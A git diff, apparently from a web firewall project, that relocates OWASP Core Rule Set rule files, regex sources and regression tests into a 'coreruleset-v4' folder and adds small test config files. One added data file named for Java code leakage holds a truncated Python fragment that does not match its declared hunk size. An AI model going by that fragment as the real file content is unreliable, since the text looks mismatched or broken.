src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/unix-shell-fps-useragents.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/windows-commands-fps.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/windows-commands-fps.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/exclude/windows-commands-fps.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/exclude/windows-commands-fps.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/932130.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/932130.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/932130.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/932130.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/allowed-charsets.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/allowed-charsets.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/allowed-charsets.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/allowed-charsets.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification-no-anchors.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification-no-anchors.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification-no-anchors.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification-no-anchors.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/charset-specification.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/charset-specification.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/js-truthy-values.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/js-truthy-values.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/js-truthy-values.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/js-truthy-values.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-function-names.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-function-names.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-function-names.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-function-names.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-4andup.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-4andup.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-4andup.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-4andup.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-evasion-prefix.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-evasion-prefix.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-pl3.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-pl3.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-pl3.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-pl3.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-upto3.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-upto3.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/unix-shell-upto3.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/unix-shell-upto3.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/url-schemes.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/url-schemes.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/url-schemes.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/url-schemes.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands-prefix.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands-prefix.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands-prefix.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands-prefix.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands.ra b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands.ra similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/include/windows-commands.ra rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/include/windows-commands.ra diff --git a/src/common/core/modsecurity/files/coreruleset/regex-assembly/toolchain.yaml b/src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/toolchain.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/regex-assembly/toolchain.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/regex-assembly/toolchain.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-901-INITIALIZATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-901-INITIALIZATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-901-INITIALIZATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-901-INITIALIZATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-905-COMMON-EXCEPTIONS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-905-COMMON-EXCEPTIONS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-905-COMMON-EXCEPTIONS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-905-COMMON-EXCEPTIONS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-911-METHOD-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-911-METHOD-ENFORCEMENT.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-911-METHOD-ENFORCEMENT.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-911-METHOD-ENFORCEMENT.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-913-SCANNER-DETECTION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-913-SCANNER-DETECTION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-913-SCANNER-DETECTION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-913-SCANNER-DETECTION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-921-PROTOCOL-ATTACK.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-921-PROTOCOL-ATTACK.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-921-PROTOCOL-ATTACK.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-922-MULTIPART-ATTACK.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-922-MULTIPART-ATTACK.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-922-MULTIPART-ATTACK.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-922-MULTIPART-ATTACK.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-934-APPLICATION-ATTACK-GENERIC.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/REQUEST-949-BLOCKING-EVALUATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-949-BLOCKING-EVALUATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/REQUEST-949-BLOCKING-EVALUATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/REQUEST-949-BLOCKING-EVALUATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-950-DATA-LEAKAGES.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-950-DATA-LEAKAGES.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-950-DATA-LEAKAGES.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-950-DATA-LEAKAGES.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-955-WEB-SHELLS.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-955-WEB-SHELLS.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-955-WEB-SHELLS.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-955-WEB-SHELLS.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-959-BLOCKING-EVALUATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-959-BLOCKING-EVALUATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-959-BLOCKING-EVALUATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-959-BLOCKING-EVALUATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-980-CORRELATION.conf b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-980-CORRELATION.conf similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-980-CORRELATION.conf rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-980-CORRELATION.conf diff --git a/src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example b/src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example rename to src/common/core/modsecurity/files/coreruleset-v4/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example diff --git a/src/common/core/modsecurity/files/coreruleset/rules/iis-errors.data b/src/common/core/modsecurity/files/coreruleset-v4/rules/iis-errors.data similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/iis-errors.data rename to src/common/core/modsecurity/files/coreruleset-v4/rules/iis-errors.data diff --git a/src/common/core/modsecurity/files/coreruleset/rules/java-classes.data b/src/common/core/modsecurity/files/coreruleset-v4/rules/java-classes.data similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/rules/java-classes.data rename to src/common/core/modsecurity/files/coreruleset-v4/rules/java-classes.data diff --git a/src/common/core/modsecurity/files/coreruleset-v4/rules/java-code-leakages.data b/src/common/core/modsecurity/files/coreruleset-v4/rules/java-code-leakages.data new file mode 100644 index 000000000..5ec620588 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/rules/java-code-leakages.data @@ -0,0 +1,17 @@ + self.blksize: + self.f.seek(-self.blksize * self.blkcount, 2) # read from end of file + self.data = self.f.read(self.blksize).split(b'\n') + # strip the last item if it's empty... a byproduct of the last line having + # a newline at the end of it + if not self.data[-1]: + self.data.pop() diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/README.md b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/README.md similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/README.md rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/README.md diff --git a/src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/__init__.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/__init__.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/util/rule_ctl/tests/__init__.py rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/__init__.py diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/config.ini b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/config.ini new file mode 100644 index 000000000..6b7c934ec --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/config.ini @@ -0,0 +1,5 @@ +[modsec2-apache] +log_location_linux = tests/logs/modsec2-apache/error.log + +[modsec3-nginx] +log_location_linux = tests/logs/modsec3-nginx/error.log diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/conftest.py b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/conftest.py new file mode 100644 index 000000000..c2e2cd975 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/conftest.py @@ -0,0 +1,17 @@ +try: + import ConfigParser as configparser +except ImportError: + import configparser +import os +import pytest + + +def pytest_addoption(parser): + parser.addoption('--config', action='store', default='modsec2-apache') + + +@pytest.fixture(scope='session') +def config(request): + cp = configparser.RawConfigParser() + cp.read(os.path.join(os.path.dirname(__file__), 'config.ini')) + return dict(cp.items(request.config.getoption('--config'))) diff --git a/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/requirements.txt b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/requirements.txt new file mode 100644 index 000000000..3bf8a34f4 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/requirements.txt @@ -0,0 +1 @@ +ftw==1.3.0 diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml rename to src/common/core/modsecurity/files/coreruleset-v4/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml diff --git 